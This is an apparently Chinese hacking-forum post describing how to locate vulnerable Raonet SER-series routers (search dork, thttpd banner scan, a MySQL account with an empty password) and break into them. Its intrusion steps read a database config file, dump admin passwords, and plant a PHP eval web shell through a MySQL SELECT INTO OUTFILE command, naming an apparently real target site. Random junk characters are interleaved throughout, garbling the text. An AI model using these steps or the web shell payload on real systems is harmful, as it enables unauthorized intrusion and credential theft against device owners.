寻找存在漏洞的路由器方法:
2 u8 V W6 f7 ]8 g, W
+ L% H7 i8 w5 ~ ?' V1:google搜索'Raonet Subscriber Ethernet Router'
0 |1 m! [% g! e( Y# T& M9 m' s
6 m. v7 t( n: Y2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001) ? g2 m# q7 o h
V8 ^. w! j/ f2 {0 s% N& a% s3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
, q& v v! D4 ]( C+ ?/ j) P
/ K% Y6 Y. g- p n; T5 k: a7 b//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
. B! Y+ O& E- h! t' C: g {# k0 U3 t* u) n$ r/ `
) x9 Q- y2 Y$ G8 Q- [; a
3 e; s) @! W; |入侵步骤:
0 U& G2 V3 ~) J0 u) D- R) L* C9 V, d/ Z+ c" H+ b. |5 k7 K7 d) u
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
. a; W6 q- @" o# ~8 I& M3 t3 [
9 M9 n4 d! H: m" i2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc/ p f( u" s0 X
3:得到密码后连接,查看GUI管理密码:
4 w' G' s9 F2 U9 ]! u/ Y2 Buse ser_500! |* S; B' c2 J1 d+ |. \& h1 O
select id,passwd from user;/ d8 z: ^1 Q# ^- V
4:通过数据库写入webshell,执行命令:6 N$ t, K1 I" o! y" ~7 v9 |
use mysql;
/ W7 D/ [! p9 B% w4 c: |+ pcreate table ok(cmd TEXT);0 @6 Q: y$ ~- R+ |6 u3 c
insert into ok values("<?php @eval($_POST[cmd])?>");3 Q$ M! a0 y. T% D
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
# P7 S2 c. V9 N$ v1 ]. h) Pdrop table ok;0 R+ x6 H6 f; {2 d! [0 `9 A) R5 s
4 S' `2 ]0 ?6 X2 t, M5:连接后门shell.php 9 U! P6 N$ O$ N0 g2 O. O4 `3 A
5 c8 d( T" Y, E7 V5 f9 m& x3 s
6. 搞定!, X. L, j( [+ ?1 K6 l' W% ?
3 C7 k& y2 ~7 q, t# ?# P% H |